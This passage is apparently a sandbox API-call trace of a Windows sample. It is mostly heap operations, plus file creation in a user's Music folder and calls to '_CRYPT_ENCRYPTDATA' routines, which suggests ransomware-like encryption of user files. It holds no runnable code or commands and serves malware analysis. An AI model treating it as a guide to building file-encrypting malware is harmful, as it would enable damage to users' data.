(HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x9004f0 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9004f0 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.694] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l")) returned 0x10 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0185.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0185.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\iytlsfhuhj3z6gymj.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0185.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.709] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0185.709] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0185.709] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0185.709] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0185.710] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0185.710] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xf5b7, lpOverlapped=0x0) returned 1 [0185.714] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0185.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf5b7) returned 0xbea018 [0185.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0185.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf5b7) returned 0xbf95d8 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.717] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf5b7) returned 0xbea018 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.717] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0185.718] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.718] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0185.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf5b7) returned 0xbea018 [0185.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0185.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf5b7) returned 0xa5f008 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0185.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0185.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0185.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0185.723] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0185.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0185.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.723] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0185.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0185.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0185.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.724] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0185.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0185.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.725] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0185.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 